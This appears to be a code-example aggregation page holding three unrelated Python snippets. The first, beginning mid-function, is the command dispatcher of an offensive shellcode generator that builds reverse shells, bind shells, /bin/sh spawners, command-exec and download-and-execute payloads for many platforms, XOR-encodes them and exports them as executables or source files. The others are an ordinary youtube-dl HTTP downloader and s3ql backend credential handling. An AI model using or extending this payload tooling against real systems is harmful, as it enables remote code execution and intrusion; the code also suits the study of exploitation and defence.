                        controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
                    elif string == "solarisx86/reverse_tcp":
                        controlset(string, self.argvlist[3], self.argvlist[2], self.argvlist[0], self.argvlist[1]) 
                    elif string == "solarisx86/tcp_bind":
                        controlset(string, self.argvlist[2], self.argvlist[3], self.argvlist[0], self.argvlist[1])     
                    else:
                        controlset(string, self.argvlist[0], self.argvlist[1])
                    self.control(string)

                elif string[:7] == "linux64":
                    if string == "linux64/read":
                        controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])                   
                    elif string == "linux64/mkdir":
                        controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
                    elif string == "linux64/tcp_bind":
                        controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])               
                    elif string == "linux64/reverse_tcp":
                        controlset(string, self.argvlist[2], self.argvlist[3], self.argvlist[1], self.argvlist[0])
                    else:
                        controlset(string, self.argvlist[0], self.argvlist[1])
                    self.control(string)

                elif string[:5] == "linux":
                    if string == "linux/read":
                        controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
                    elif string == "linux/tcp_bind":
                        controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
                    elif string == "linux/reverse_tcp":
                        controlset(string, self.argvlist[2], self.argvlist[3], self.argvlist[0], self.argvlist[1])                 
                    else:
                        controlset(string, self.argvlist[0], self.argvlist[1])
                    self.control(string)

                elif string[:5] == "osx86":
                    if string == "osx86/tcp_bind":
                        controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
                    elif string == "osx86/reverse_tcp":
                        controlset(string, self.argvlist[2], self.argvlist[3], self.argvlist[1], self.argvlist[0])
                    else:
                        controlset(string, self.argvlist[0], self.argvlist[1])
                    self.control(string)

                elif string[:5] == "osx64":
                    if string == "osx64/tcp_bind":
                        controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
                    elif string == "osx64/reverse_tcp":
                        controlset(string, self.argvlist[2], self.argvlist[3], self.argvlist[0], self.argvlist[1])
                    else:
                        controlset(string, self.argvlist[0], self.argvlist[1])

                    self.control(string)

                elif string[:11] == "freebsd_x86":
                    if string == "freebsd_x86/reverse_tcp2":
                        controlset(string, self.argvlist[3], self.argvlist[2], self.argvlist[0], self.argvlist[1])
                    elif string == "freebsd_x86/reverse_tcp":
                        controlset(string, self.argvlist[3], self.argvlist[2], self.argvlist[0], self.argvlist[1])             
                    elif string == "freebsd_x86/read":
                        controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
                    elif string == "freebsd_x86/exec":
                        controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])                   
                    elif string == "freebsd_x86/tcp_bind":
                        controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
                    else:
                        controlset(string, self.argvlist[0], self.argvlist[1])
                    self.control(string)

                elif string[:11] == "freebsd_x64":
                    if string == "freebsd_x64/tcp_bind":
                        controlset(string, self.argvlist[0], self.argvlist[1], self.argvlist[2], self.argvlist[3])
                    elif string == "freebsd_x64/reverse_tcp":
                        controlset(string, self.argvlist[2], self.argvlist[3], self.argvlist[0], self.argvlist[1]) 
                    elif string == "freebsd_x64/exec":
                        controlset(string, self.argvlist[0], self.argvlist[1], self.argvlist[2])
                    else:
                        controlset(string, self.argvlist[0], self.argvlist[1])
                    self.control(string)

                elif string[:9] == "linux_arm":
                    if string == "linux_arm/chmod":
                        controlset(string, self.argvlist[0], self.argvlist[1], self.argvlist[2])
                    elif string == "linux_arm/exec":
                        controlset(string, self.argvlist[0], self.argvlist[1], self.argvlist[2])
                    elif string == "linux_arm/reverse_tcp":
                        controlset(string, self.argvlist[2], self.argvlist[3], self.argvlist[0], self.argvlist[1])
                    else:
                        controlset(string, self.argvlist[0], self.argvlist[1])
                    self.control(string)

                elif string[:10] == "linux_mips":
                    if string == "linux_mips/chmod":
                        controlset(string, self.argvlist[0], self.argvlist[1], self.argvlist[2])
                    elif string == "linux_mips/reverse_tcp":
                        controlset(string, self.argvlist[0], self.argvlist[1], self.argvlist[2], self.argvlist[3])
                    elif string == "linux_mips/tcp_bind":
                        controlset(string, self.argvlist[0], self.argvlist[1], self.argvlist[2])
                    else:
                        controlset(string, self.argvlist[0], self.argvlist[1])
                    self.control(string)

                elif string[:7] == "windows":
                    if string == "windows/messagebox":
                        controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
                    elif string == "windows/exec":
                        controlset(string, self.argvlist[1], self.argvlist[0], self.argvlist[2])
                    elif string == "windows/download&execute":
                        controlset(string, self.argvlist[0], self.argvlist[1], self.argvlist[2], self.argvlist[3])
                    elif string == "windows/reverse_tcp":
                        controlset(string, self.argvlist[2], self.argvlist[3], self.argvlist[0], self.argvlist[1])
                    elif string == "windows/tcp_bind":
                        controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])                  
                    self.control(string)

            elif terminal[:8] == "generate":
                from .database.generator import generator
                if string[:7] == "linux86":
                    if string == "linux86/binsh_spawn":
                        self.disassembly = generator("linux86", "binsh_spawn")

                    elif string == "linux86/read":
                        if self.argvlist[2] == "None":
                            print("\nFile name must be declared.\n")
                            self.control(string)
                        self.disassembly = generator("linux86", "read", FILE=self.argvlist[2])

                    elif string == "linux86/exec":
                        if self.argvlist[2] == "None":
                            print("\nCommand must be declared.\n")
                            self.control(string)
                        self.disassembly = generator("linux86", "exec", COMMAND=self.argvlist[2])

                    elif string == "linux86/download&exec":
                        if self.argvlist[2] == "None":
                            print("\nLink must be declared.\n")
                            self.control(string)
                        elif "/" not in self.argvlist[2]:
                            print("\nWrong url format example : 127.0.0.1/X\n") 
                            self.control(string)
                        elif len(self.argvlist[2].split("/")[-1]) != 1:
                            print("\nYour filename must be one lenght ..\n")   
                            self.control(string)

                        if "http" in self.argvlist[2] or "https" in self.argvlist[2] or "www." in self.argvlist:
                            try:
                                edit = self.argvlist[2].replace("http://", "").replace("https://", "").replace("www.", "")
                                self.argvlist[2] = edit
                            except:
                                pass
                        self.disassembly = generator("linux86", "download&exec", URL=self.argvlist[2])

                    elif string == "linux86/chmod":
                        if self.argvlist[2] == "None":
                            print("\nFile name must be declared.\n")
                            self.control(string)
                        self.disassembly = generator("linux86", "chmod", FILE=self.argvlist[2])

                    elif string == "linux86/tcp_bind":
                        if self.argvlist[2] == "None":
                            print("\nPORT must be declared.\n")
                            self.control(string)
                        self.disassembly = generator("linux86", "tcp_bind", port=self.argvlist[2])

                    elif string == "linux86/reverse_tcp":   
                        if self.argvlist[2] == "None" or self.argvlist[3] == "None": 
                            print("\nHost&Port must be declared.\n")
                            self.control(string)
                        self.disassembly = generator("linux86", "reverse_tcp", ip=self.argvlist[3], port=self.argvlist[2])

                elif string[:7] == "linux64":
                    if string == "linux64/binsh_spawn":
                        self.disassembly = generator("linux64", "binsh_spawn")
                    elif string == "linux64/tcp_bind":
                        self.disassembly = generator("linux64", "tcp_bind", port=self.argvlist[2])
                    elif string == "linux64/reverse_tcp":
                        self.disassembly = generator("linux64", "reverse_tcp", ip=self.argvlist[3], port=self.argvlist[2])
                    elif string == "linux64/read":
                        self.disassembly = generator("linux64", "read", FILE=self.argvlist[2])    

                if string[:5] == "linux":
                    if string == "linux/read":
                        if self.argvlist[2] == "None":
                            print("\nFile name must be declared.\n")
                            self.control(string)
                        self.disassembly = generator("linux", "read", FILE=self.argvlist[2])
                    elif string == "linux/binsh_spawn":
                        self.disassembly = generator("linux", "binsh_spawn")
                    elif string == "linux/tcp_bind":
                        self.disassembly = generator("linux", "tcp_bind", port=self.argvlist[2])
                    elif string == "linux/reverse_tcp":
                        self.disassembly = generator("linux", "reverse_tcp", ip=self.argvlist[3], port=self.argvlist[2])

                elif string[:5] == "osx86":
                    if string == "osx86/tcp_bind":
                        self.disassembly = generator("osx86", "tcp_bind", port=self.argvlist[2])
                    elif string == "osx86/binsh_spawn":
                        self.disassembly = generator("osx86", "binsh_spawn")
                    elif string == "osx86/reverse_tcp":
                        self.disassembly = generator("osx86", "reverse_tcp", ip=self.argvlist[3], port=self.argvlist[2])

                elif string[:5] == "osx64":
                    if string == "osx64/binsh_spawn":
                        self.disassembly = generator("osx64", "binsh_spawn")
                    elif string == "osx64/tcp_bind":
                        self.disassembly = generator("osx64", "tcp_bind", port=self.argvlist[2])
                    elif string == "osx64/reverse_tcp":
                        self.disassembly = generator("osx64", "reverse_tcp", ip=self.argvlist[3], port=self.argvlist[2])

                elif string[:11] == "freebsd_x86":
                    if string == "freebsd_x86/binsh_spawn":
                        self.disassembly = generator("freebsdx86", "binsh_spawn")
                    elif string == "freebsd_x86/read":
                        self.disassembly = generator("freebsdx86", "read", FILE=self.argvlist[2])
                    elif string == "freebsd_x86/reverse_tcp":
                        self.disassembly = generator("freebsdx86", "reverse_tcp", ip=self.argvlist[3], port=self.argvlist[2])
                    elif string == "freebsd_x86/reverse_tcp2":
                        self.disassembly = generator("freebsdx86", "reverse_tcp2", ip=self.argvlist[3], port=self.argvlist[2])
                    elif string == "freebsd_x86/exec":
                        self.disassembly = generator("freebsdx86", "exec", COMMAND=self.argvlist[2])
                    elif string == "freebsd_x86/tcp_bind":
                        self.disassembly = generator("freebsdx86", "tcp_bind", port=self.argvlist[2])

                elif string[:11] == "freebsd_x64":
                    if string == "freebsd_x64/binsh_spawn":
                        self.disassembly = generator("freebsdx64", "binsh_spawn")
                    elif string == "freebsd_x64/tcp_bind":
                        self.disassembly = generator("freebsdx64", "tcp_bind", port=self.argvlist[2], PASSWORD=self.argvlist[3])
                    elif string == "freebsd_x64/reverse_tcp":
                        self.disassembly = generator("freebsdx64", "reverse_tcp", ip=self.argvlist[3], port=self.argvlist[2])
                    elif string == "freebsd_x64/exec":
                        self.disassembly = generator("freebsdx64", "exec", COMMAND=self.argvlist[2])

                elif string[:9] == "linux_arm":
                    if string == "linux_arm/chmod":
                        self.disassembly = generator("linux_arm", "chmod", FILE=self.argvlist[2])
                    elif string == "linux_arm/binsh_spawn":
                        self.disassembly = generator("linux_arm", "binsh_spawn")
                    elif string == "linux_arm/reverse_tcp":
                        self.disassembly = generator("linux_arm", "reverse_tcp", ip=self.argvlist[3], port=self.argvlist[2])
                    elif string == "linux_arm/exec":
                        self.disassembly = generator("linux_arm", "exec", COMMAND=self.argvlist[2])    

                elif string[:10] == "linux_mips":
                    if string == "linux_mips/reverse_tcp":
                        self.disassembly = generator("linux_mips", "reverse_tcp", ip=self.argvlist[3], port=self.argvlist[2])
                    elif string == "linux_mips/binsh_spawn":
                        self.disassembly = generator("linux_mips", "binsh_spawn")
                    elif string == "linux_mips/chmod":
                        self.disassembly = generator("linux_mips", "chmod", FILE=self.argvlist[2])
                    elif string == "linux_mips/tcp_bind":
                        self.disassembly = generator("linux_mips", "tcp_bind", port=self.argvlist[2])

                elif string[:7] == "windows":
                    if string == "windows/messagebox":
                        self.disassembly = generator("windows", "messagebox", MESSAGE=self.argvlist[2])
                    elif string == "windows/download&execute":
                        self.disassembly = generator("windows", "downloandandexecute", URL=self.argvlist[2], FILENAME=self.argvlist[3])
                    elif string == "windows/exec":
                        self.disassembly = generator("windows", "exec", COMMAND=self.argvlist[2])
                    elif string == "windows/reverse_tcp":
                        self.disassembly = generator("windows", "reverse_tcp", ip=self.argvlist[3], port=self.argvlist[2])                  
                    elif string == "windows/tcp_bind":
                        self.disassembly = generator("windows", "tcp_bind", port=self.argvlist[2])

                elif string[:10] == "solarisx86":                   
                    if string == "solarisx86/binsh_spawn":
                        self.disassembly = generator("solarisx86", "binsh_spawn")
                    elif string == "solarisx86/read":
                        if self.argvlist[2] == "None":
                            print("\nFile name must be declared.\n")
                            self.control(string)
                        self.disassembly = generator("solarisx86", "read", FILE=self.argvlist[2])
                    elif string == "solarisx86/reverse_tcp":
                        self.disassembly = generator("solarisx86", "reverse_tcp", ip=self.argvlist[3], port=self.argvlist[2])
                    elif string == "solarisx86/tcp_bind":
                        self.disassembly = generator("solarisx86", "tcp_bind", port=self.argvlist[2])

                if self.argvlist[0] == "x86/xor_b3m":
                    from .encoders.shellcode.xor_b3m import prestart
                    if self.argvlist[1] == "None":
                        self.argvlist[1] = 1
                    elif self.argvlist[1] == 0:
                        self.argvlist[1] = 1
                    self.disassembly = prestart(self.disassembly.replace("\\x", ""), int(self.argvlist[1]))

                elif self.argvlist[0] == "x86/xor":
                    from .encoders.shellcode.xor import prestart
                    if self.argvlist[1] == "None":
                        self.argvlist[1] = 1
                    elif self.argvlist[1] == 0:
                        self.argvlist[1] = 1
                    self.disassembly = prestart(self.disassembly.replace("\\x", ""), int(self.argvlist[1]))

                else:
                    self.disassembly = self.disassembly 

                # print "\n"+"Shellcode Lenght : %d" % len(str(bytearray(self.disassembly.replace("\\x", "").decode("hex"))))
                B3mB4m.prettyout(self.disassembly)
                self.control(string)

            elif terminal[:6] == "output":
                if self.disassembly == "None":
                    print("Please generate shellcode before save it.")
                    self.control(string)   

                # I'm not sure about this option, should I get this option with params 
                # Or directly inputs ? ..
                if terminal[7:10].lower() == "exe":
                    # Will be add missing parts ..
                    if "linux86" in terminal.lower():
                        OS = "linux86"
                    elif "linux64" in terminal.lower():
                        OS = "linux64"
                    elif "windows" in terminal.lower():
                        OS = "windows"
                    elif "freebsdx86" in terminal.lower():
                        OS = "freebsdx86"
                    elif "freebsdx64" in terminal.lower():
                        OS = "freebsdx64"
                    elif "openbsdx86" in terminal.lower():
                        OS = "openbsdx86"
                    elif "solarisx86" in terminal.lower():
                        OS = "solarisx86"
                    elif "linuxpowerpc" in terminal.lower():
                        OS = "linuxpowerpc"
                    elif "openbsdpowerpc" in terminal.lower():
                        OS = "openbsdpowerpc"           
                    elif "linuxsparc" in terminal.lower():
                        OS = "linuxsparc"
                    elif "freebsdsparc" in terminal.lower():
                        OS = "freebsdsparc"
                    elif "openbsdsparc" in terminal.lower():
                        OS = "openbsdsparc"
                    elif "solarissparc" in terminal.lower():
                        OS = "solarissparc"
                    elif "linuxarm" in terminal.lower():
                        OS = "linuxarm"
                    elif "freebsdarm" in terminal.lower():
                        OS = "freebsdarm"
                    elif "openbsdarm" in terminal.lower():
                        OS = "openbsdarm"
                    else:
                        OS = None

                    from .Outputs.exe import ExeFile
                    ExeFile(self.disassembly, OS)
                    self.control(string)

                elif terminal[7:10].lower() == "c++" or terminal[7:10].lower() == "cpp":
                    from .Outputs.Cplusplus import CplusplusFile
                    if "windows" in string:
                        CplusplusFile(self.disassembly, True)
                    else:
                        CplusplusFile(self.disassembly)

                elif terminal[7:8].lower() == "c":
                    if "windows" in string:
                        from .Outputs.Cplusplus import CplusplusFile
                        CplusplusFile(self.disassembly, True)
                    else:
                        from .Outputs.C import CFile
                        CFile(self.disassembly)                

                elif terminal[7:9].lower() == "py" or terminal[7:13].lower() == "python": 
                    from .Outputs.python import PyFile
                    PyFile(self.disassembly)

                elif terminal[7:10].lower() == "txt":
                    from .Outputs.txt import TxtFile
                    TxtFile(self.disassembly)  

                else:
                    print(bcolors.RED + bcolors.BOLD + "[-] Unknown output type: {0}".format(terminal) + bcolors.ENDC)
                self.control(string)                   

            elif terminal[:5] == "clear":
                B3mB4m.clean()
                self.control(string)

            elif terminal[:2].lower() == "ip":
                B3mB4m.IP()
                self.control(string)

            elif terminal[:13] == "show encoders":
                from .core.lists import encoderlist
                encoderlist()
                self.control(string)

            elif terminal[:5] == "disas":
                B3mB4m().startdisas( self.disassembly, string)
                self.control(string)

            else:
                if not terminal:
                    self.control(string)
                else:
                    print(bcolors.RED + bcolors.BOLD + "[-] Unknown command: {0}".format(terminal) + bcolors.ENDC)
                    self.control(string)

Example 49

Project: script.module.youtube.dl
Source File: http.py
View license
    def real_download(self, filename, info_dict):
        url = info_dict['url']
        tmpfilename = self.temp_name(filename)
        stream = None

        # Do not include the Accept-Encoding header
        headers = {'Youtubedl-no-compression': 'True'}
        add_headers = info_dict.get('http_headers')
        if add_headers:
            headers.update(add_headers)
        basic_request = sanitized_Request(url, None, headers)
        request = sanitized_Request(url, None, headers)

        is_test = self.params.get('test', False)

        if is_test:
            request.add_header('Range', 'bytes=0-%s' % str(self._TEST_FILE_SIZE - 1))

        # Establish possible resume length
        if os.path.isfile(encodeFilename(tmpfilename)):
            resume_len = os.path.getsize(encodeFilename(tmpfilename))
        else:
            resume_len = 0

        open_mode = 'wb'
        if resume_len != 0:
            if self.params.get('continuedl', True):
                self.report_resuming_byte(resume_len)
                request.add_header('Range', 'bytes=%d-' % resume_len)
                open_mode = 'ab'
            else:
                resume_len = 0

        count = 0
        retries = self.params.get('retries', 0)
        while count <= retries:
            # Establish connection
            try:
                data = self.ydl.urlopen(request)
                # When trying to resume, Content-Range HTTP header of response has to be checked
                # to match the value of requested Range HTTP header. This is due to a webservers
                # that don't support resuming and serve a whole file with no Content-Range
                # set in response despite of requested Range (see
                # https://github.com/rg3/youtube-dl/issues/6057#issuecomment-126129799)
                if resume_len > 0:
                    content_range = data.headers.get('Content-Range')
                    if content_range:
                        content_range_m = re.search(r'bytes (\d+)-', content_range)
                        # Content-Range is present and matches requested Range, resume is possible
                        if content_range_m and resume_len == int(content_range_m.group(1)):
                            break
                    # Content-Range is either not present or invalid. Assuming remote webserver is
                    # trying to send the whole file, resume is not possible, so wiping the local file
                    # and performing entire redownload
                    self.report_unable_to_resume()
                    resume_len = 0
                    open_mode = 'wb'
                break
            except (compat_urllib_error.HTTPError, ) as err:
                if (err.code < 500 or err.code >= 600) and err.code != 416:
                    # Unexpected HTTP error
                    raise
                elif err.code == 416:
                    # Unable to resume (requested range not satisfiable)
                    try:
                        # Open the connection again without the range header
                        data = self.ydl.urlopen(basic_request)
                        content_length = data.info()['Content-Length']
                    except (compat_urllib_error.HTTPError, ) as err:
                        if err.code < 500 or err.code >= 600:
                            raise
                    else:
                        # Examine the reported length
                        if (content_length is not None and
                                (resume_len - 100 < int(content_length) < resume_len + 100)):
                            # The file had already been fully downloaded.
                            # Explanation to the above condition: in issue #175 it was revealed that
                            # YouTube sometimes adds or removes a few bytes from the end of the file,
                            # changing the file size slightly and causing problems for some users. So
                            # I decided to implement a suggested change and consider the file
                            # completely downloaded if the file size differs less than 100 bytes from
                            # the one in the hard drive.
                            self.report_file_already_downloaded(filename)
                            self.try_rename(tmpfilename, filename)
                            self._hook_progress({
                                'filename': filename,
                                'status': 'finished',
                                'downloaded_bytes': resume_len,
                                'total_bytes': resume_len,
                            })
                            return True
                        else:
                            # The length does not match, we start the download over
                            self.report_unable_to_resume()
                            resume_len = 0
                            open_mode = 'wb'
                            break
            except socket.error as e:
                if e.errno != errno.ECONNRESET:
                    # Connection reset is no problem, just retry
                    raise

            # Retry
            count += 1
            if count <= retries:
                self.report_retry(count, retries)

        if count > retries:
            self.report_error('giving up after %s retries' % retries)
            return False

        data_len = data.info().get('Content-length', None)

        # Range HTTP header may be ignored/unsupported by a webserver
        # (e.g. extractor/scivee.py, extractor/bambuser.py).
        # However, for a test we still would like to download just a piece of a file.
        # To achieve this we limit data_len to _TEST_FILE_SIZE and manually control
        # block size when downloading a file.
        if is_test and (data_len is None or int(data_len) > self._TEST_FILE_SIZE):
            data_len = self._TEST_FILE_SIZE

        if data_len is not None:
            data_len = int(data_len) + resume_len
            min_data_len = self.params.get('min_filesize')
            max_data_len = self.params.get('max_filesize')
            if min_data_len is not None and data_len < min_data_len:
                self.to_screen('\r[download] File is smaller than min-filesize (%s bytes < %s bytes). Aborting.' % (data_len, min_data_len))
                return False
            if max_data_len is not None and data_len > max_data_len:
                self.to_screen('\r[download] File is larger than max-filesize (%s bytes > %s bytes). Aborting.' % (data_len, max_data_len))
                return False

        byte_counter = 0 + resume_len
        block_size = self.params.get('buffersize', 1024)
        start = time.time()

        # measure time over whole while-loop, so slow_down() and best_block_size() work together properly
        now = None  # needed for slow_down() in the first loop run
        before = start  # start measuring
        while True:

            # Download and write
            data_block = data.read(block_size if not is_test else min(block_size, data_len - byte_counter))
            byte_counter += len(data_block)

            # exit loop when download is finished
            if len(data_block) == 0:
                break

            # Open destination file just in time
            if stream is None:
                try:
                    (stream, tmpfilename) = sanitize_open(tmpfilename, open_mode)
                    assert stream is not None
                    filename = self.undo_temp_name(tmpfilename)
                    self.report_destination(filename)
                except (OSError, IOError) as err:
                    self.report_error('unable to open for writing: %s' % str(err))
                    return False

                if self.params.get('xattr_set_filesize', False) and data_len is not None:
                    try:
                        write_xattr(tmpfilename, 'user.ytdl.filesize', str(data_len).encode('utf-8'))
                    except (XAttrUnavailableError, XAttrMetadataError) as err:
                        self.report_error('unable to set filesize xattr: %s' % str(err))

            try:
                stream.write(data_block)
            except (IOError, OSError) as err:
                self.to_stderr('\n')
                self.report_error('unable to write data: %s' % str(err))
                return False

            # Apply rate limit
            self.slow_down(start, now, byte_counter - resume_len)

            # end measuring of one loop run
            now = time.time()
            after = now

            # Adjust block size
            if not self.params.get('noresizebuffer', False):
                block_size = self.best_block_size(after - before, len(data_block))

            before = after

            # Progress message
            speed = self.calc_speed(start, now, byte_counter - resume_len)
            if data_len is None:
                eta = None
            else:
                eta = self.calc_eta(start, time.time(), data_len - resume_len, byte_counter - resume_len)

            self._hook_progress({
                'status': 'downloading',
                'downloaded_bytes': byte_counter,
                'total_bytes': data_len,
                'tmpfilename': tmpfilename,
                'filename': filename,
                'eta': eta,
                'speed': speed,
                'elapsed': now - start,
            })

            if is_test and byte_counter == data_len:
                break

        if stream is None:
            self.to_stderr('\n')
            self.report_error('Did not get any data blocks')
            return False
        if tmpfilename != '-':
            stream.close()

        if data_len is not None and byte_counter != data_len:
            raise ContentTooShortError(byte_counter, int(data_len))
        self.try_rename(tmpfilename, filename)

        # Update file modification time
        if self.params.get('updatetime', True):
            info_dict['filetime'] = self.try_utime(filename, data.info().get('last-modified', None))

        self._hook_progress({
            'downloaded_bytes': byte_counter,
            'total_bytes': byte_counter,
            'filename': filename,
            'status': 'finished',
            'elapsed': time.time() - start,
        })

        return True

Example 50

Project: s3ql
Source File: common.py
View license
def get_backend_factory(storage_url, backend_options, authfile,
                        compress=('lzma', 2), raw=False):
    '''Return factory producing backend objects for given storage-url

    If *raw* is true, don't attempt to unlock and don't wrap into
    ComprencBackend.
    '''

    from .backends import prefix_map
    from .backends.common import (CorruptedObjectError, NoSuchObject, AuthenticationError,
                                  DanglingStorageURLError, AuthorizationError)
    from .backends.comprenc import ComprencBackend

    hit = re.match(r'^([a-zA-Z0-9]+)://', storage_url)
    if not hit:
        raise QuietError('Unable to parse storage url "%s"' % storage_url,
                         exitcode=2)

    backend = hit.group(1)
    try:
        backend_class = prefix_map[backend]
    except KeyError:
        raise QuietError('No such backend: %s' % backend, exitcode=11)

    # Validate backend options
    for opt in backend_options.keys():
        if opt not in backend_class.known_options:
            raise QuietError('Unknown backend option: %s' % opt,
                             exitcode=3)

    # Read authfile
    config = configparser.ConfigParser()
    if os.path.isfile(authfile):
        mode = os.stat(authfile).st_mode
        if mode & (stat.S_IRGRP | stat.S_IROTH):
            raise QuietError("%s has insecure permissions, aborting." % authfile,
                             exitcode=12)
        config.read(authfile)

    backend_login = None
    backend_passphrase = None
    fs_passphrase = None
    for section in config.sections():
        def getopt(name):
            try:
                return config.get(section, name)
            except configparser.NoOptionError:
                return None

        pattern = getopt('storage-url')

        if not pattern or not storage_url.startswith(pattern):
            continue

        backend_login = getopt('backend-login') or backend_login
        backend_passphrase = getopt('backend-password') or backend_passphrase
        fs_passphrase = getopt('fs-passphrase') or fs_passphrase

    if not backend_login and backend_class.needs_login:
        if sys.stdin.isatty():
            backend_login = getpass("Enter backend login: ")
        else:
            backend_login = sys.stdin.readline().rstrip()

    if not backend_passphrase and backend_class.needs_login:
        if sys.stdin.isatty():
            backend_passphrase = getpass("Enter backend passphrase: ")
        else:
            backend_passphrase = sys.stdin.readline().rstrip()

    backend = None
    try:
        backend = backend_class(storage_url, backend_login, backend_passphrase,
                                backend_options)

        # Do not use backend.lookup(), this would use a HEAD request and
        # not provide any useful error messages if something goes wrong
        # (e.g. wrong credentials)
        backend.fetch('s3ql_passphrase')

    except AuthenticationError:
        raise QuietError('Invalid credentials (or skewed system clock?).',
                         exitcode=14)

    except AuthorizationError:
        raise QuietError('No permission to access backend.',
                         exitcode=15)

    except HostnameNotResolvable:
        raise QuietError("Can't connect to backend: unable to resolve hostname",
                         exitcode=19)

    except DanglingStorageURLError as exc:
        raise QuietError(str(exc), exitcode=16)

    except NoSuchObject:
        encrypted = False

    else:
        encrypted = True

    finally:
        if backend is not None:
            backend.close()

    if raw:
        return lambda: backend_class(storage_url, backend_login, backend_passphrase,
                                     backend_options)

    if encrypted and not fs_passphrase:
        if sys.stdin.isatty():
            fs_passphrase = getpass("Enter file system encryption passphrase: ")
        else:
            fs_passphrase = sys.stdin.readline().rstrip()
    elif not encrypted:
        fs_passphrase = None

    if fs_passphrase is not None:
        fs_passphrase = fs_passphrase.encode('utf-8')

    if not encrypted:
        return lambda: ComprencBackend(None, compress,
                                    backend_class(storage_url, backend_login,
                                                  backend_passphrase, backend_options))

    with ComprencBackend(fs_passphrase, compress, backend) as tmp_backend:
        try:
            data_pw = tmp_backend['s3ql_passphrase']
        except CorruptedObjectError:
            raise QuietError('Wrong file system passphrase', exitcode=17)

    # To support upgrade, temporarily store the backend
    # passphrase in every backend object.
    def factory():
        b = ComprencBackend(data_pw, compress,
                            backend_class(storage_url, backend_login,
                                          backend_passphrase, backend_options))
        b.fs_passphrase = fs_passphrase
        return b

    return factory